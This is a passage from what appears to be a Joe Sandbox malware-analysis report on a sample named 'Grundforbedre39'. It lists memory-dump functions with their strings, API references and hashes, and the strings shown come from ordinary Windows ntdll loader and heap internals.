                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.S5
                                                                                      • API String ID: 0-1346052954
                                                                                      • Opcode ID: e5a0445408cf79298c5c21a24e6cfefbc9cdf02e6382c700e9ff6ef744d3868e
                                                                                      • Instruction ID: ea0f15ea90247fd16290db6f29a43d1aacba8701fd56dacee0734ad02ecc1786
                                                                                      • Opcode Fuzzy Hash: e5a0445408cf79298c5c21a24e6cfefbc9cdf02e6382c700e9ff6ef744d3868e
                                                                                      • Instruction Fuzzy Hash: 1EA12BB1A083459FE721CF54C840B5BB7E8BB84769F414D2EF98997240DB74E948CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3553D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlDebugPrintTimes.NTDLL ref: 3553D879
                                                                                        • Part of subcall function 35514779: RtlDebugPrintTimes.NTDLL ref: 35514817
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-1975516107
                                                                                      • Opcode ID: 8ef512304fc3ed7633ec5042305992548dc0f66537c4bcc8d206d25a71c9a0b5
                                                                                      • Instruction ID: 8fc6b30e32b78bbafa4b8ac3150a95100ea553804f34374c196983e355a91673
                                                                                      • Opcode Fuzzy Hash: 8ef512304fc3ed7633ec5042305992548dc0f66537c4bcc8d206d25a71c9a0b5
                                                                                      • Instruction Fuzzy Hash: 625112B5A09349AFEB04CFA4C44578DBFB2BF84394F614059C409BB281DB71B942CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35598633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • VerifierDebug, xrefs: 35598925
                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 3559880F
                                                                                      • VerifierFlags, xrefs: 355988D0
                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 355986BD
                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 355986E7
                                                                                      • HandleTraces, xrefs: 3559890F
                                                                                      • VerifierDlls, xrefs: 3559893D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                      • API String ID: 0-3223716464
                                                                                      • Opcode ID: 86973b185a1a2c87ed8b1cf606494c3fb57ce46ab1530f0640412b211475f960
                                                                                      • Instruction ID: e2200f848c8e233314b5bb3b80b1e771ee11661388b243839d0ea5cc7737dacd
                                                                                      • Opcode Fuzzy Hash: 86973b185a1a2c87ed8b1cf606494c3fb57ce46ab1530f0640412b211475f960
                                                                                      • Instruction Fuzzy Hash: 3B9125B2608715AFE719CF24C890F9A77B9BF84714F850859F9406B240CB39BC05CBE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3553237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 3557A7AF
                                                                                      • DGN5, xrefs: 35532382
                                                                                      • LdrpDynamicShimModule, xrefs: 3557A7A5
                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3557A79F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: DGN5$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-42042572
                                                                                      • Opcode ID: c590e78acc6a2f7e418282247d18c597b5baf80385be13814f9b33f3a6815567
                                                                                      • Instruction ID: 9749f206d48202f15b4a45ba0870165b6443b294f0256e3a3026a7ea78f7fd09
                                                                                      • Opcode Fuzzy Hash: c590e78acc6a2f7e418282247d18c597b5baf80385be13814f9b33f3a6815567
                                                                                      • Instruction Fuzzy Hash: B531FE76B18204ABE7149F19D881E5A77BAFFC0750F5500A9E801AB240DBB2B942CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-523794902
                                                                                      • Opcode ID: 772420096bb09adab50eb19a54e9c45129151bb7cc4d2db9c7dff06a08b7285d
                                                                                      • Instruction ID: 1bea17396079ae420fe00f09108f820f98afa9a7270fd85d3a9804b2084efed8
                                                                                      • Opcode Fuzzy Hash: 772420096bb09adab50eb19a54e9c45129151bb7cc4d2db9c7dff06a08b7285d
                                                                                      • Instruction Fuzzy Hash: 7A42DC752087829FD305CF28C880A6ABBE5FF88758F444D69E885DB291DB70F941CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3553510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.S5
                                                                                      • API String ID: 0-1093851986
                                                                                      • Opcode ID: 7c6ca5ff2fea413e47d331b2b564f08c5bfe3562848dab47813cd22dac63e5e9
                                                                                      • Instruction ID: 449389753b52383064de44768501046fe7c004af37698bebba2c7ae0f0513de6
                                                                                      • Opcode Fuzzy Hash: 7c6ca5ff2fea413e47d331b2b564f08c5bfe3562848dab47813cd22dac63e5e9
                                                                                      • Instruction Fuzzy Hash: F6F161B6E05219EFCB16CF98C981EDEB7B8FF48650F51046AE505E7210E770AE01CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3552B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                      • API String ID: 0-122214566
                                                                                      • Opcode ID: 2812f47cb02f8c3d9e1ef65460e39ee755108948d52fd15188708c785faa3279
                                                                                      • Instruction ID: c438404e56feeef79ca3ff7115f60833f49f8f0b8b974f18261ed3a080ceae8a
                                                                                      • Opcode Fuzzy Hash: 2812f47cb02f8c3d9e1ef65460e39ee755108948d52fd15188708c785faa3279
                                                                                      • Instruction Fuzzy Hash: 20C12675B08315AFEB05CBA4C890B7EB7B1BF85320F944469E802AB2D0DB74F944C790
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3554631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-792281065
                                                                                      • Opcode ID: 41371fb782276564138b73b3dd9d09077e991fe045c8678187929fca35ef2f00
                                                                                      • Instruction ID: 3d1530d61ef11cbb833363a1623bd9959a8792e7d5d642b638edf4df17cee3c5
                                                                                      • Opcode Fuzzy Hash: 41371fb782276564138b73b3dd9d09077e991fe045c8678187929fca35ef2f00
                                                                                      • Instruction Fuzzy Hash: CA9118B5B0A359EFEB19CF14DC44B9A77B1FB80765F41006AE9066B280DB747802CBD5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35542594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 35581F6A, 35581FA4, 35581FC4
                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 35581F8A
                                                                                      • SXS: %s() passed the empty activation context, xrefs: 35581F6F
                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 35581FC9
                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 35581FA9
                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 35581F82
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                      • API String ID: 0-861424205
                                                                                      • Opcode ID: 9dd6ff35648d90a856ba84a246dba6efb800243c5e006f8df22956b61f33baf1
                                                                                      • Instruction ID: ea2934e14499c630ab241ee85dad3e397a030fdedffd5afbe5ab3d71fffe60ca
                                                                                      • Opcode Fuzzy Hash: 9dd6ff35648d90a856ba84a246dba6efb800243c5e006f8df22956b61f33baf1
                                                                                      • Instruction Fuzzy Hash: 0831F2B6B04264BBF7148A8ADD80F9B7B78AF40690F424599F905B7240CB70BE00CBE4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35520680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-4253913091
                                                                                      • Opcode ID: 84d305e227e600bc3786e6cde7ee1ec387838afe395210c68aa365b11a8e9d78
                                                                                      • Instruction ID: 33a7b287e3b825c79e804f645ea24944ec5d9af876b2fbdbf6f89eae18fe18b2
                                                                                      • Opcode Fuzzy Hash: 84d305e227e600bc3786e6cde7ee1ec387838afe395210c68aa365b11a8e9d78
                                                                                      • Instruction Fuzzy Hash: 38F19876A01605DFEB05CF68C884F6AB7B6FF84340F1485A9E4169B7A1DB70F981CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35539723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 3446177414-2283098728
                                                                                      • Opcode ID: a3f11ab04e65c07cc31e6ef6693bb07042ec7a9e8d9c7769db0af9e137a47b3d
                                                                                      • Instruction ID: 8fa4951d5ac6656260508988d653d5a0c38b6dd80963dfaccad787c831eabe2e
                                                                                      • Opcode Fuzzy Hash: a3f11ab04e65c07cc31e6ef6693bb07042ec7a9e8d9c7769db0af9e137a47b3d
                                                                                      • Instruction Fuzzy Hash: 9251F1B570A3059FE714DF28C882B1ABBB1BBC5310F440A6DE45A976D1EB70B845CBD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3554C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • Failed to reallocate the system dirs string !, xrefs: 355880E2
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 355880F3
                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 355880E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-1783798831
                                                                                      • Opcode ID: 73b984cd8b8b788bc070ec398f606d5f50402c4156ab9f08e1e42aee70fbb5c5
                                                                                      • Instruction ID: ee64c36dbe6c925253d716fc5a0a96035cf7164c62d10b5af39c542576ea7a12
                                                                                      • Opcode Fuzzy Hash: 73b984cd8b8b788bc070ec398f606d5f50402c4156ab9f08e1e42aee70fbb5c5
                                                                                      • Instruction Fuzzy Hash: 8E41C0B5629304ABD710DF28DC40B5B77F9FF84650F41592AB848A7290EF74F801CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355943D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 35594508
                                                                                      • LdrpCheckRedirection, xrefs: 3559450F
                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 35594519
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                      • API String ID: 3446177414-3154609507
                                                                                      • Opcode ID: a276f9706038c8e293cce8b16d211d6f3fba9f81fa336f311ad1d44fa6dd2770
                                                                                      • Instruction ID: edf70e2eb6d701e2f6aba675eebd12197f6f8f1f51c59d18fdc8223dd2bba0ce
                                                                                      • Opcode Fuzzy Hash: a276f9706038c8e293cce8b16d211d6f3fba9f81fa336f311ad1d44fa6dd2770
                                                                                      • Instruction Fuzzy Hash: F141D0B6608311DBDB18CF58D940A9677E5BF88756F050A69EC4CAB251EB38FC008BC1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355EACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 9ad58b6444ddc690d62f0ea82b8b300bb3ce1f3eaf9dfd59abeb3541f62c3fee
                                                                                      • Instruction ID: 47acf7eb3772d7388f0578e32476c9a93c49ab7eb5427962886ad446a8004336
                                                                                      • Opcode Fuzzy Hash: 9ad58b6444ddc690d62f0ea82b8b300bb3ce1f3eaf9dfd59abeb3541f62c3fee
                                                                                      • Instruction Fuzzy Hash: 9CF1E676F006159BCB08CF78C9946BDBBF6BF88210B59416DD866EB384D634FA41CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35507662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlReAllocateHeap
                                                                                      • API String ID: 0-941669491
                                                                                      • Opcode ID: bec3230dfcb41ea903ceb4eda18c95fa895e64a414c12221c6428372923ccdd9
                                                                                      • Instruction ID: 41989eacc4e7eb9e961cdbfb17ef81a62ed8763bcb8e6c5f0e1649a397633911
                                                                                      • Opcode Fuzzy Hash: bec3230dfcb41ea903ceb4eda18c95fa895e64a414c12221c6428372923ccdd9
                                                                                      • Instruction Fuzzy Hash: D3014C362181C0EFE319D328E448F9A77B4EB8173AF594C89E40047591CE54B880DE60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35510485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 35510586
                                                                                      • kLsE, xrefs: 355105FE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                      • API String ID: 3446177414-2547482624
                                                                                      • Opcode ID: 8798ffe42728f26475469f58bf9075d76b8c045a5d6775d55324ca277e251126
                                                                                      • Instruction ID: 13660cd9e4186e5a47e44ad5c455904db6a1f30a55d6efdebcd8ceced734e8ea
                                                                                      • Opcode Fuzzy Hash: 8798ffe42728f26475469f58bf9075d76b8c045a5d6775d55324ca277e251126
                                                                                      • Instruction Fuzzy Hash: 4F51BEB6A01745DFEB10DFA6C440AABBBF4BF44304F01483ED99687260EB74B645CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35511380 Relevance: 5.4, Strings: 4, Instructions: 385COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-2084224854
                                                                                      • Opcode ID: 22d6b61a1099e9be2892088630c063f115e10618c55bd6de72499feb578f4550
                                                                                      • Instruction ID: 43d24df15081480e65f63db2cf66d42199a277758fcd802e893ddc39e4191d3e
                                                                                      • Opcode Fuzzy Hash: 22d6b61a1099e9be2892088630c063f115e10618c55bd6de72499feb578f4550
                                                                                      • Instruction Fuzzy Hash: D2E1DF74A047859BEB14CF68C490B7ABBF1BF48314F548899E896CB645EB74FA40CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3551B5E0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LUN5$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                      • API String ID: 0-3214703027
                                                                                      • Opcode ID: 66d2d4a50dad7fb441128b8b2efa44b96992e5c8f6c614416de140604925bf4d
                                                                                      • Instruction ID: 92d49a7982ff6f4a6483c609c69a4693ec97fb788a6aa0adc7bf666d85874261
                                                                                      • Opcode Fuzzy Hash: 66d2d4a50dad7fb441128b8b2efa44b96992e5c8f6c614416de140604925bf4d
                                                                                      • Instruction Fuzzy Hash: B9B1BB76A047048BEB15CF64C990B9DBBB6BFA47A4F214829E951EB390D730FA40CB44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35548322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 35548341
                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3554847E
                                                                                      • @, xrefs: 355484B1
                                                                                      • LdrpInitializeProcess, xrefs: 35548342
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
